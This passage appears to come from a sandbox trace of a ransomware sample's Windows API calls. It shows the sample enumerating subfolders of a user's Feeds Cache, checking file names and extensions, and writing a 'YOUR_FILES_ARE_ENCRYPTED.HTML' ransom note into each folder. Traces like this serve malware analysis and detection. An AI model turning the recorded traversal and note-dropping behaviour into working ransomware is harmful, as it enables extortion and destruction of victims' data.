ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a8b533b, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.157] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8aa5825e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="4CSSRV00", cAlternateFileName="")) returned 1 [0159.157] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\4CSSRV00") returned 68 [0159.157] GetProcessHeap () returned 0x270000 [0159.157] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7422068 [0159.160] lstrcpyW (in: lpString1=0x7422068, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\4CSSRV00" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\4CSSRV00") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\4CSSRV00" [0159.160] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\4CSSRV00", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\4CSSRV00\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\4CSSRV00\\*" [0159.160] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\4CSSRV00\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8aa5825e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0159.160] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8aa5825e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.161] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xd25f1b90, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a88f1db, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0159.161] wnsprintfW (in: pszDest=0x7422068, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\4CSSRV00\\desktop.ini") returned 80 [0159.161] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.161] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0159.161] lstrlenW (lpString=".ini") returned 4 [0159.161] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0159.161] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25f1b90, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8aa5825e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="fwlink[1]", cAlternateFileName="FWLINK~1")) returned 1 [0159.161] wnsprintfW (in: pszDest=0x7422068, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\4CSSRV00\\fwlink[1]") returned 78 [0159.161] lstrcmpW (lpString1="fwlink[1]", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.161] PathFindExtensionW (pszPath="fwlink[1]") returned="" [0159.161] lstrlenW (lpString="") returned 0 [0159.161] PathFindExtensionW (pszPath="fwlink[1]") returned="" [0159.161] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25f1b90, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8aa5825e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="fwlink[1]", cAlternateFileName="FWLINK~1")) returned 0 [0159.161] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0159.161] wnsprintfW (in: pszDest=0x7422068, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\4CSSRV00\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 98 [0159.161] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\4CSSRV00\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\feeds cache\\4cssrv00\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0159.162] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0159.164] CloseHandle (hObject=0x5a8) returned 1 [0159.164] GetProcessHeap () returned 0x270000 [0159.165] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0159.180] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xd25f1b90, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a88f1db, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0159.180] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini") returned 71 [0159.180] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.180] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0159.180] lstrlenW (lpString=".ini") returned 4 [0159.180] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0159.180] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ad2bc83, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="DT1GIE4D", cAlternateFileName="")) returned 1 [0159.180] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\DT1GIE4D") returned 68 [0159.180] GetProcessHeap () returned 0x270000 [0159.181] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7422068 [0159.181] lstrcpyW (in: lpString1=0x7422068, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\DT1GIE4D" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\DT1GIE4D") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\DT1GIE4D" [0159.181] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\DT1GIE4D", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\DT1GIE4D\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\DT1GIE4D\\*" [0159.181] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\DT1GIE4D\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ad2bc83, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0159.181] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ad2bc83, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.181] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xd25f1b90, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a8b533b, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0159.181] wnsprintfW (in: pszDest=0x7422068, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\DT1GIE4D\\desktop.ini") returned 80 [0159.181] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.181] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0159.181] lstrlenW (lpString=".ini") returned 4 [0159.181] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0159.181] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25f1b90, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ad2bc83, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="fwlink[1]", cAlternateFileName="FWLINK~1")) returned 1 [0159.181] wnsprintfW (in: pszDest=0x7422068, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\DT1GIE4D\\fwlink[1]") returned 78 [0159.181] lstrcmpW (lpString1="fwlink[1]", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.182] PathFindExtensionW (pszPath="fwlink[1]") returned="" [0159.182] lstrlenW (lpString="") returned 0 [0159.182] PathFindExtensionW (pszPath="fwlink[1]") returned="" [0159.182] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25f1b90, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ad2bc83, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="fwlink[1]", cAlternateFileName="FWLINK~1")) returned 0 [0159.182] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0159.185] wnsprintfW (in: pszDest=0x7422068, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\DT1GIE4D\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 98 [0159.185] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\DT1GIE4D\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\feeds cache\\dt1gie4d\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0159.185] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0159.188] CloseHandle (hObject=0x5a8) returned 1 [0159.188] GetProcessHeap () returned 0x270000 [0159.189] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0159.191] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8abd5021, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="F6GEI81Z", cAlternateFileName="")) returned 1 [0159.191] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\F6GEI81Z") returned 68 [0159.191] GetProcessHeap () returned 0x270000 [0159.192] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7422068 [0159.192] lstrcpyW (in: lpString1=0x7422068, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\F6GEI81Z" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\F6GEI81Z") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\F6GEI81Z" [0159.192] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\F6GEI81Z", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\F6GEI81Z\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\F6GEI81Z\\*" [0159.192] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\F6GEI81Z\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8abd5021, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0159.192] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8abd5021, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.193] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xd25f1b90, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a88f1db, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0159.193] wnsprintfW (in: pszDest=0x7422068, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\F6GEI81Z\\desktop.ini") returned 80 [0159.193] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.193] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0159.193] lstrlenW (lpString=".ini") returned 4 [0159.193] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0159.193] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25f1b90, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8abd5021, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="fwlink[1]", cAlternateFileName="FWLINK~1")) returned 1 [0159.193] wnsprintfW (in: pszDest=0x7422068, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\F6GEI81Z\\fwlink[1]") returned 78 [0159.193] lstrcmpW (lpString1="fwlink[1]", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.193] PathFindExtensionW (pszPath="fwlink[1]") returned="" [0159.193] lstrlenW (lpString="") returned 0 [0159.193] PathFindExtensionW (pszPath="fwlink[1]") returned="" [0159.193] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25f1b90, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8abd5021, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="fwlink[1]", cAlternateFileName="FWLINK~1")) returned 0 [0159.193] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0159.196] wnsprintfW (in: pszDest=0x7422068, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\F6GEI81Z\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 98 [0159.196] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\F6GEI81Z\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\feeds cache\\f6gei81z\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0159.197] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0159.199] CloseHandle (hObject=0x5a8) returned 1 [0159.199] GetProcessHeap () returned 0x270000 [0159.200] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0159.202] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ab3caa0, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="GXO2H2PJ", cAlternateFileName="")) returned 1 [0159.202] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\GXO2H2PJ") returned 68 [0159.202] GetProcessHeap () returned 0x270000 [0159.202] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7422068 [0159.202] lstrcpyW (in: lpString1=0x7422068, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\GXO2H2PJ" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\GXO2H2PJ") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\GXO2H2PJ" [0159.202] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\GXO2H2PJ", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\GXO2H2PJ\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\GXO2H2PJ\\*" [0159.202] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\GXO2H2PJ\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ab3caa0, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0159.203] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ab3caa0, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.203] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xd25f1b90, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a88f1db, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0159.203] wnsprintfW (in: pszDest=0x7422068, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\GXO2H2PJ\\desktop.ini") returned 80 [0159.203] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.204] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0159.204] lstrlenW (lpString=".ini") returned 4 [0159.204] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0159.204] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25f1b90, ftCreationTime.dwHighDateTime=0x1d70517, 